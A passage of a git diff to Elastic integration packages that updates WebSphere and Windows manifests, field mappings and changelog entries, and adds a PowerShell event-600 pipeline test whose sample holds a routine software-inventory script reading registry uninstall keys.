@@ -1,97 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "0eac0fd6-b8fc-4080-a3e6-3915b79b0fed": { - "columnOrder": [ - "2be98fc5-9e15-4e81-8ba1-f4cbc6f2c06a" - ], - "columns": { - "2be98fc5-9e15-4e81-8ba1-f4cbc6f2c06a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Invalidated sessions by Timeouts", - "operationType": "last_value", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 0 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "websphere_application_server.session_manager.sessions.invalidated.by_timeouts" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "4a163dcc-72d4-4fa7-a5e0-32e5fc5284ec", - "key": "websphere_application_server.session_manager.sessions.invalidated.by_timeouts", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "websphere_application_server.session_manager.sessions.invalidated.by_timeouts" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "2be98fc5-9e15-4e81-8ba1-f4cbc6f2c06a", - "layerId": "0eac0fd6-b8fc-4080-a3e6-3915b79b0fed", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Invalidated sessions by Timeouts [Metrics WebSphere Application Server]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-f28f6670-c07a-11ec-8552-f3dc1a6b95f9", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0eac0fd6-b8fc-4080-a3e6-3915b79b0fed", - 
"type": "index-pattern"
- },
- {
- "id": "metrics-*",
- "name": "4a163dcc-72d4-4fa7-a5e0-32e5fc5284ec",
- "type": "index-pattern"
- }
- ],
- "type": "lens"
-}
\ No newline at end of file
diff --git a/packages/websphere_application_server/manifest.yml b/packages/websphere_application_server/manifest.yml
index cd2613a58a6..cd1cc3ec1c4 100644
--- a/packages/websphere_application_server/manifest.yml
+++ b/packages/websphere_application_server/manifest.yml
@@ -1,7 +1,7 @@
-format_version: "3.0.0"
+format_version: "3.0.2"
 name: websphere_application_server
 title: WebSphere Application Server
-version: "1.1.0"
+version: "1.3.0"
 description: Collects metrics from IBM WebSphere Application Server with Elastic Agent.
 type: integration
 categories:
@@ -9,7 +9,7 @@ categories:
 - observability
 conditions:
 kibana:
- version: "^8.3.0"
+ version: "^8.12.0"
 elastic:
 subscription: basic
 screenshots:
@@ -65,6 +65,7 @@ policy_templates:
 - name: password
 type: password
 title: Password
+ secret: true
 multi: false
 required: false
 show_user: false
diff --git a/packages/windows/changelog.yml b/packages/windows/changelog.yml
index 14489a32904..64e900ef49d 100644
--- a/packages/windows/changelog.yml
+++ b/packages/windows/changelog.yml
@@ -1,4 +1,24 @@
 # newer versions go on top
+- version: "1.44.5"
+ changes:
+ - description: Fix splitting of parameters for event 600 where it can hold multiline values in parameters.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9490
+- version: "1.44.4"
+ changes:
+ - description: Map host.os.type explicitly for all data streams.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/9367
+- version: "1.44.3"
+ changes:
+ - description: Add filters for visualizations to ensure only AppLocker events are displayed
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/8993
+- version: "1.44.2"
+ changes:
+ - description: Added error.message and http.request.body.bytes ECS field mapping.
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/8976
 - version: "1.44.1"
 changes:
 - description: Properly parse file hashes for Sysmon event ID 26, file delete detected
diff --git a/packages/windows/data_stream/applocker_exe_and_dll/fields/agent.yml b/packages/windows/data_stream/applocker_exe_and_dll/fields/agent.yml
index 665ec1e6c19..431119029b3 100644
--- a/packages/windows/data_stream/applocker_exe_and_dll/fields/agent.yml
+++ b/packages/windows/data_stream/applocker_exe_and_dll/fields/agent.yml
@@ -54,6 +54,8 @@
 external: ecs
 - name: os.platform
 external: ecs
+ - name: os.type
+ external: ecs
 - name: os.version
 external: ecs
 - name: type
diff --git a/packages/windows/data_stream/applocker_exe_and_dll/manifest.yml b/packages/windows/data_stream/applocker_exe_and_dll/manifest.yml
index 8e7d528fe9a..9194a65e230 100644
--- a/packages/windows/data_stream/applocker_exe_and_dll/manifest.yml
+++ b/packages/windows/data_stream/applocker_exe_and_dll/manifest.yml
@@ -53,6 +53,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -63,7 +64,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows AppLocker EXE and DLL Events via Splunk Enterprise REST API description: Collect AppLocker EXE and DLL Events via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/applocker_msi_and_script/fields/agent.yml b/packages/windows/data_stream/applocker_msi_and_script/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/applocker_msi_and_script/fields/agent.yml +++ b/packages/windows/data_stream/applocker_msi_and_script/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/applocker_msi_and_script/manifest.yml b/packages/windows/data_stream/applocker_msi_and_script/manifest.yml index 16ff4b87063..4f1e602b8f8 100644 --- a/packages/windows/data_stream/applocker_msi_and_script/manifest.yml +++ b/packages/windows/data_stream/applocker_msi_and_script/manifest.yml @@ -53,6 +53,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations 
@@ -63,7 +64,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows AppLocker MSI and Script Events via Splunk Enterprise REST API description: Collect AppLocker MSI and Script Events via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/applocker_packaged_app_deployment/fields/agent.yml b/packages/windows/data_stream/applocker_packaged_app_deployment/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/applocker_packaged_app_deployment/fields/agent.yml +++ b/packages/windows/data_stream/applocker_packaged_app_deployment/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/applocker_packaged_app_deployment/manifest.yml b/packages/windows/data_stream/applocker_packaged_app_deployment/manifest.yml index fdb402f7bf0..a08d1582b6a 100644 --- a/packages/windows/data_stream/applocker_packaged_app_deployment/manifest.yml +++ b/packages/windows/data_stream/applocker_packaged_app_deployment/manifest.yml @@ -53,6 +53,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -63,7 +64,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows AppLocker/Packaged app-Deployment Events via Splunk Enterprise REST API description: Collect AppLocker Packaged app-Deployment Events via Splunk Enterprise REST API 
diff --git a/packages/windows/data_stream/applocker_packaged_app_execution/fields/agent.yml b/packages/windows/data_stream/applocker_packaged_app_execution/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/applocker_packaged_app_execution/fields/agent.yml +++ b/packages/windows/data_stream/applocker_packaged_app_execution/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/applocker_packaged_app_execution/manifest.yml b/packages/windows/data_stream/applocker_packaged_app_execution/manifest.yml index 5b463668014..a7a0b5eacf9 100644 --- a/packages/windows/data_stream/applocker_packaged_app_execution/manifest.yml +++ b/packages/windows/data_stream/applocker_packaged_app_execution/manifest.yml @@ -53,6 +53,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -63,7 +64,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows AppLocker/Packaged app-Execution Events via Splunk Enterprise REST API description: Collect AppLocker Packaged app-Execution Events via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4662.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4662.json index 3c8d6db144a..e139af56815 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4662.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4662.json 
@@ -44,4 +44,4 @@ } } ] -} +} \ No newline at end of file diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json index 20217effad9..c4c112fb488 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json @@ -62,4 +62,4 @@ } } ] -} +} \ No newline at end of file diff --git a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json-expected.json b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json-expected.json index 9747c600d3a..142696f5055 100644 --- a/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json-expected.json +++ b/packages/windows/data_stream/forwarded/_dev/test/pipeline/test-security-4746-user.json-expected.json @@ -101,4 +101,4 @@ } } ] -} +} \ No newline at end of file diff --git a/packages/windows/data_stream/forwarded/fields/agent.yml b/packages/windows/data_stream/forwarded/fields/agent.yml index 665ec1e6c19..431119029b3 100644 --- a/packages/windows/data_stream/forwarded/fields/agent.yml +++ b/packages/windows/data_stream/forwarded/fields/agent.yml @@ -54,6 +54,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/forwarded/fields/ecs.yml b/packages/windows/data_stream/forwarded/fields/ecs.yml index 0647023c979..bd0c561fc17 100644 --- a/packages/windows/data_stream/forwarded/fields/ecs.yml +++ b/packages/windows/data_stream/forwarded/fields/ecs.yml @@ -50,6 +50,8 @@ name: ecs.version - external: ecs name: error.code +- external: ecs + name: error.message - external: ecs name: event.action - external: ecs 
@@ -118,6 +120,8 @@ name: group.name - external: ecs name: host.name +- external: ecs + name: http.request.body.bytes - external: ecs name: log.file.path - external: ecs diff --git a/packages/windows/data_stream/forwarded/manifest.yml b/packages/windows/data_stream/forwarded/manifest.yml index e9bc4e762a2..56bbee8b6e0 100644 --- a/packages/windows/data_stream/forwarded/manifest.yml +++ b/packages/windows/data_stream/forwarded/manifest.yml @@ -61,6 +61,7 @@ streams: show_user: false description: > Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. + - name: custom type: yaml title: Custom Configurations @@ -71,7 +72,6 @@ streams: default: |- # Winlog configuration example #batch_read_size: 100 - - input: httpjson title: Windows ForwardedEvents via Splunk Enterprise REST API description: Collect ForwardedEvents via Splunk Enterprise REST API diff --git a/packages/windows/data_stream/perfmon/fields/agent.yml b/packages/windows/data_stream/perfmon/fields/agent.yml index 294674f3128..918048a45b8 100644 --- a/packages/windows/data_stream/perfmon/fields/agent.yml +++ b/packages/windows/data_stream/perfmon/fields/agent.yml @@ -56,6 +56,8 @@ external: ecs - name: os.platform external: ecs + - name: os.type + external: ecs - name: os.version external: ecs - name: type diff --git a/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json b/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json index 251fff9bc44..1c201c475bb 100644 --- a/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json +++ b/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json 
@@ -206,6 +206,34 @@ "record_id": 1847, "task": "Pipeline Execution Details" } + }, + { + "winlog": { + "computer_name": "foo", + "record_id": 67086, + "event_id": "600", + "task": "Provider Lifecycle", + "keywords": [ + "Classic" + ], + "channel": "Windows PowerShell", + "event_data": { + "param3": "\tProviderName=Function\n\tNewProviderState=Started\n\n\tSequenceNumber=9\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.20348.2227\n\tHostId=00654153-46ad-42bf-ad06-3bfce5c65b55\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe function Convert-GuidToCompressedGuid {\n\t[CmdletBinding()]\n\t\t\t\t\t\t[OutputType('System.String')]\n\tparam (\n\t\t\t\t\t\t\t[Parameter(ValueFromPipeline=\"\", ValueFromPipelineByPropertyName=\"\", Mandatory=$true)]\n\t\t\t\t\t\t\t[string]$Guid\n\t\t\t\t\t\t)\n\t\t\t\t\t\tbegin {\n\t$Guid= $Guid.Replace('-', '').Replace('{', '').Replace('}', '')\n\t\t\t\t\t\t}\n\t\t\t\t\t\tprocess {\n\t\t\t\t\t\t\ttry {\n\t\t\t\t\t\t\t\t$Groups = @(\n\t\t\t\t\t\t\t\t\t$Guid.Substring(0, 8).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(8, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(12, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(16, 16).ToCharArray()\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t$Groups[0..2] | foreach {\n\t\t\t\t\t\t\t\t\t[array]::Reverse($_)\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid = ($Groups[0..2] | foreach { $_ -join '' }) -join ''\n\n\t\t\t\t\t\t\t\t$chararr = $Groups[3]\n\t\t\t\t\t\t\t\tfor ($i = 0; $i -lt $chararr.count; $i++) {\n\t\t\t\t\t\t\t\t\tif (($i % 2) -eq 0) {\n\t\t\t\t\t\t\t\t\t\t$CompressedGuid += ($chararr[$i+1] + $chararr[$i]) -join ''\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid\n\t\t\t\t\t\t\t} catch {\n\t\t\t\t\t\t\t\tWrite-Error $_.Exception.Message\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n function Clean-Quotes-Backslash {\n param ([string]$str)\n if($str.length -ge 2 -and $str.Substring(0,1) -eq '\"' -and 
$str.Substring($str.length - 1) -eq '\"'){\n $str = $str.Substring(1, $str.length - 2)\n }\n $str = $str.Replace('\\', '\\\\')\n $str = $str.Replace('\"', '\\\"')\n return $str\n }\n\t\t\t\t $products = Get-ItemProperty HKLM:\\Software\\Classes\\Installer\\Products\\* | Select-Object @{n=\"PSChildName\";e={$_.\"PSChildName\"}} |\n\t\t\t\t Select -expand PSChildName\n\n\t\t\t\t \n[Console]::OutputEncoding = [System.Text.Encoding]::UTF8\nGet-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |\nWhere-Object {($_.DisplayName -ne $null -and $_DisplayName -ne '' -and $_.DisplayName -notmatch '^KB[000000-999999]') -and\n\t($_.SystemComponent -eq $null -or ($_.SystemComponent -ne $null -and $_.SystemComponent -eq '0')) -and\n\t($_.ParentKeyName -eq $null) -and\n\t($_.WindowsInstaller -eq $null -or ($_.WindowsInstaller -eq '0') -or ($_.WindowsInstaller -eq 1 -and $products -contains (Convert-GuidToCompressedGuid $_.PSChildName))) -and\n\t($_.ReleaseType -eq $null -or ($_.ReleaseType -ne $null -and\n\t\t$_.ReleaseType -ne 'Security Update' -and\n\t\t$_.ReleaseType -ne 'Update Rollup' -and\n\t\t$_.ReleaseType -ne 'Hotfix'))\n} |\nSelect-Object @{n=\"Name\";e={$_.\"DisplayName\"}},\n\t@{n=\"PackageId\";e={$_.\"PSChildName\"}}, @{n=\"Version\";e={$_.\"DisplayVersion\"}}, Publisher,\n\t@{n=\"InstalledTime\";e={[datetime]::ParseExact($_.\"InstallDate\",\"yyyyMMdd\",$null).ToUniversalTime().ToString(\"yyyy-MM-ddTHH:mm:ssZ\")}} | % { [Console]::WriteLine(@\"\n{\"Name\":\"$(Clean-Quotes-Backslash $_.Name)\",\"PackageId\":\"$($_.PackageId)\",\"Version\":\"$(Clean-Quotes-Backslash $_.Version)\",\"Publisher\":\"$(Clean-Quotes-Backslash $_.Publisher)\",\"InstalledTime\":\"$($_.InstalledTime)\"},\n\"@)} \n\tEngineVersion=\n\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=", + "param1": "Function", + "param2": "Started" + }, + "api": "wineventlog", + "provider_name": "PowerShell", + "opcode": "Info" + 
}, + "message": "Provider \"Function\" is Started. \n\nDetails: \n\tProviderName=Function\n\tNewProviderState=Started\n\n\tSequenceNumber=9\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.20348.2227\n\tHostId=00654153-46ad-42bf-ad06-3bfce5c65b55\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe function Convert-GuidToCompressedGuid {\n\t\t\t\t\t\t[CmdletBinding()]\n\t\t\t\t\t\t[OutputType('System.String')]\n\t\t\t\t\t\tparam (\n\t\t\t\t\t\t\t[Parameter(ValueFromPipeline=\"\", ValueFromPipelineByPropertyName=\"\", Mandatory=$true)]\n\t\t\t\t\t\t\t[string]$Guid\n\t\t\t\t\t\t)\n\t\t\t\t\t\tbegin {\n\t\t\t\t\t\t\t$Guid = $Guid.Replace('-', '').Replace('{', '').Replace('}', '')\n\t\t\t\t\t\t}\n\t\t\t\t\t\tprocess {\n\t\t\t\t\t\t\ttry {\n\t\t\t\t\t\t\t\t$Groups = @(\n\t\t\t\t\t\t\t\t\t$Guid.Substring(0, 8).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(8, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(12, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(16, 16).ToCharArray()\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t$Groups[0..2] | foreach {\n\t\t\t\t\t\t\t\t\t[array]::Reverse($_)\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid = ($Groups[0..2] | foreach { $_ -join '' }) -join ''\n\n\t\t\t\t\t\t\t\t$chararr = $Groups[3]\n\t\t\t\t\t\t\t\tfor ($i = 0; $i -lt $chararr.count; $i++) {\n\t\t\t\t\t\t\t\t\tif (($i % 2) -eq 0) {\n\t\t\t\t\t\t\t\t\t\t$CompressedGuid += ($chararr[$i+1] + $chararr[$i]) -join ''\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid\n\t\t\t\t\t\t\t} catch {\n\t\t\t\t\t\t\t\tWrite-Error $_.Exception.Message\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n function Clean-Quotes-Backslash {\n param ([string]$str)\n if($str.length -ge 2 -and $str.Substring(0,1) -eq '\"' -and $str.Substring($str.length - 1) -eq '\"'){\n $str = $str.Substring(1, $str.length - 2)\n }\n $str = $str.Replace('\\', '\\\\')\n $str = $str.Replace('\"', '\\\"')\n return $str\n }\n\t\t\t\t $products = Get-ItemProperty 
HKLM:\\Software\\Classes\\Installer\\Products\\* | Select-Object @{n=\"PSChildName\";e={$_.\"PSChildName\"}} |\n\t\t\t\t Select -expand PSChildName\n\n\t\t\t\t \n[Console]::OutputEncoding = [System.Text.Encoding]::UTF8\nGet-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |\nWhere-Object {($_.DisplayName -ne $null -and $_DisplayName -ne '' -and $_.DisplayName -notmatch '^KB[000000-999999]') -and\n\t($_.SystemComponent -eq $null -or ($_.SystemComponent -ne $null -and $_.SystemComponent -eq '0')) -and\n\t($_.ParentKeyName -eq $null) -and\n\t($_.WindowsInstaller -eq $null -or ($_.WindowsInstaller -eq '0') -or ($_.WindowsInstaller -eq 1 -and $products -contains (Convert-GuidToCompressedGuid $_.PSChildName))) -and\n\t($_.ReleaseType -eq $null -or ($_.ReleaseType -ne $null -and\n\t\t$_.ReleaseType -ne 'Security Update' -and\n\t\t$_.ReleaseType -ne 'Update Rollup' -and\n\t\t$_.ReleaseType -ne 'Hotfix'))\n} |\nSelect-Object @{n=\"Name\";e={$_.\"DisplayName\"}},\n\t@{n=\"PackageId\";e={$_.\"PSChildName\"}}, @{n=\"Version\";e={$_.\"DisplayVersion\"}}, Publisher,\n\t@{n=\"InstalledTime\";e={[datetime]::ParseExact($_.\"InstallDate\",\"yyyyMMdd\",$null).ToUniversalTime().ToString(\"yyyy-MM-ddTHH:mm:ssZ\")}} | % { [Console]::WriteLine(@\"\n{\"Name\":\"$(Clean-Quotes-Backslash $_.Name)\",\"PackageId\":\"$($_.PackageId)\",\"Version\":\"$(Clean-Quotes-Backslash $_.Version)\",\"Publisher\":\"$(Clean-Quotes-Backslash $_.Publisher)\",\"InstalledTime\":\"$($_.InstalledTime)\"},\n\"@)} \n\tEngineVersion=\n\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=", + "@timestamp": "2024-03-28T19:01:28.331Z", + "event": { + "code": "600", + "provider": "PowerShell", + "action": "Provider Lifecycle", + "dataset": "windows.powershell" + } } ] } \ No newline at end of file 
diff --git a/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json b/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json index b1edb463cc6..e8020052aed 100644 --- a/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json +++ b/packages/windows/data_stream/powershell/_dev/test/pipeline/test-events.json-expected.json 
@@ -441,6 +441,171 @@ "record_id": "1847", "task": "Pipeline Execution Details" } + }, + { + "@timestamp": "2024-03-28T19:01:28.331Z", + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Provider Lifecycle", + "category": "process", + "code": "600", + "dataset": "windows.powershell", + "kind": "event", + "provider": "PowerShell", + "sequence": 9, + "type": "info" + }, + "message": "Provider \"Function\" is Started. \n\nDetails: \n\tProviderName=Function\n\tNewProviderState=Started\n\n\tSequenceNumber=9\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.20348.2227\n\tHostId=00654153-46ad-42bf-ad06-3bfce5c65b55\n\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe function Convert-GuidToCompressedGuid {\n\t\t\t\t\t\t[CmdletBinding()]\n\t\t\t\t\t\t[OutputType('System.String')]\n\t\t\t\t\t\tparam (\n\t\t\t\t\t\t\t[Parameter(ValueFromPipeline=\"\", ValueFromPipelineByPropertyName=\"\", Mandatory=$true)]\n\t\t\t\t\t\t\t[string]$Guid\n\t\t\t\t\t\t)\n\t\t\t\t\t\tbegin {\n\t\t\t\t\t\t\t$Guid = $Guid.Replace('-', '').Replace('{', '').Replace('}', '')\n\t\t\t\t\t\t}\n\t\t\t\t\t\tprocess {\n\t\t\t\t\t\t\ttry {\n\t\t\t\t\t\t\t\t$Groups = @(\n\t\t\t\t\t\t\t\t\t$Guid.Substring(0, 8).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(8, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(12, 4).ToCharArray(),\n\t\t\t\t\t\t\t\t\t$Guid.Substring(16, 16).ToCharArray()\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\t$Groups[0..2] | foreach {\n\t\t\t\t\t\t\t\t\t[array]::Reverse($_)\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid = ($Groups[0..2] | foreach { $_ -join '' }) -join ''\n\n\t\t\t\t\t\t\t\t$chararr = $Groups[3]\n\t\t\t\t\t\t\t\tfor ($i = 0; $i -lt $chararr.count; $i++) {\n\t\t\t\t\t\t\t\t\tif (($i % 2) -eq 0) {\n\t\t\t\t\t\t\t\t\t\t$CompressedGuid += ($chararr[$i+1] + $chararr[$i]) -join ''\n\t\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t\t$CompressedGuid\n\t\t\t\t\t\t\t} catch {\n\t\t\t\t\t\t\t\tWrite-Error 
$_.Exception.Message\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n function Clean-Quotes-Backslash {\n param ([string]$str)\n if($str.length -ge 2 -and $str.Substring(0,1) -eq '\"' -and $str.Substring($str.length - 1) -eq '\"'){\n $str = $str.Substring(1, $str.length - 2)\n }\n $str = $str.Replace('\\', '\\\\')\n $str = $str.Replace('\"', '\\\"')\n return $str\n }\n\t\t\t\t $products = Get-ItemProperty HKLM:\\Software\\Classes\\Installer\\Products\\* | Select-Object @{n=\"PSChildName\";e={$_.\"PSChildName\"}} |\n\t\t\t\t Select -expand PSChildName\n\n\t\t\t\t \n[Console]::OutputEncoding = [System.Text.Encoding]::UTF8\nGet-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* |\nWhere-Object {($_.DisplayName -ne $null -and $_DisplayName -ne '' -and $_.DisplayName -notmatch '^KB[000000-999999]') -and\n\t($_.SystemComponent -eq $null -or ($_.SystemComponent -ne $null -and $_.SystemComponent -eq '0')) -and\n\t($_.ParentKeyName -eq $null) -and\n\t($_.WindowsInstaller -eq $null -or ($_.WindowsInstaller -eq '0') -or ($_.WindowsInstaller -eq 1 -and $products -contains (Convert-GuidToCompressedGuid $_.PSChildName))) -and\n\t($_.ReleaseType -eq $null -or ($_.ReleaseType -ne $null -and\n\t\t$_.ReleaseType -ne 'Security Update' -and\n\t\t$_.ReleaseType -ne 'Update Rollup' -and\n\t\t$_.ReleaseType -ne 'Hotfix'))\n} |\nSelect-Object @{n=\"Name\";e={$_.\"DisplayName\"}},\n\t@{n=\"PackageId\";e={$_.\"PSChildName\"}}, @{n=\"Version\";e={$_.\"DisplayVersion\"}}, Publisher,\n\t@{n=\"InstalledTime\";e={[datetime]::ParseExact($_.\"InstallDate\",\"yyyyMMdd\",$null).ToUniversalTime().ToString(\"yyyy-MM-ddTHH:mm:ssZ\")}} | % { [Console]::WriteLine(@\"\n{\"Name\":\"$(Clean-Quotes-Backslash $_.Name)\",\"PackageId\":\"$($_.PackageId)\",\"Version\":\"$(Clean-Quotes-Backslash $_.Version)\",\"Publisher\":\"$(Clean-Quotes-Backslash $_.Publisher)\",\"InstalledTime\":\"$($_.InstalledTime)\"},\n\"@)} 
\n\tEngineVersion=\n\tRunspaceId=\n\tPipelineId=\n\tCommandName=\n\tCommandType=\n\tScriptName=\n\tCommandPath=\n\tCommandLine=", + "powershell": { + "process": { + "executable_version": "5.1.20348.2227" + }, + "provider": { + "name": "Function", + "new_state": "Started" + } + }, + "process": { + "args": [ + "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "function", + "Convert-GuidToCompressedGuid", + "{\n", + "[CmdletBinding()]\n", + "[OutputType('System.String')]\n", + "param", + "(\n", + "[Parameter(ValueFromPipeline=,", + "ValueFromPipelineByPropertyName=,", + "Mandatory=$true)]\n", + "[string]$Guid\n", + ")\n", + "begin", + "{\n", + "$Guid=", + "$Guid.Replace('-',", + "'').Replace('{',", + "'').Replace('}',", + "'')\n", + "}\n", + "process", + "{\n", + "try", + "{\n", + "$Groups", + "=", + "@(\n", + "$Guid.Substring(0,", + "8).ToCharArray(),\n", + "$Guid.Substring(8,", + "4).ToCharArray(),\n", + "$Guid.Substring(12,", + "4).ToCharArray(),\n", + "$Guid.Substring(16,", + "16).ToCharArray()\n", + ")\n", + "$Groups[0..2]", + "|", + "foreach", + "{\n", + "[array]::Reverse($_)\n", + "}\n", + "$CompressedGuid", + "=", + "($Groups[0..2]", + "|", + "foreach", + "{", + "$_", + "-join", + "''", + "})", + "-join", + "''\n\n", + "$chararr", + "=", + "$Groups[3]\n", + "for", + "($i", + "=", + "0;", + "$i", + "-lt", + "$chararr.count;", + "$i++)", + "{\n", + "if", + "(($i", + "%", + "2)", + "-eq", + "0)", + "{\n", + "$CompressedGuid", + "+=", + "($chararr[$i+1]", + "+", + "$chararr[$i])", + "-join", + "''\n", + "}\n", + "}\n", + "$CompressedGuid\n", + "}", + "catch", + "{\n", + "Write-Error", + "$_.Exception.Message\n", + "}\n", + "}\n", + "}\n", + "function", + "Clean-Quotes-Backslash", + "{\n", + "param", + "([string]$str)\n", + "if($str.length", + "-ge", + "2", + "-and", + "$str.Substring(0,1)", + "-eq", + "'' -and $str.Substring($str.length - 1) -eq ''){\n", + 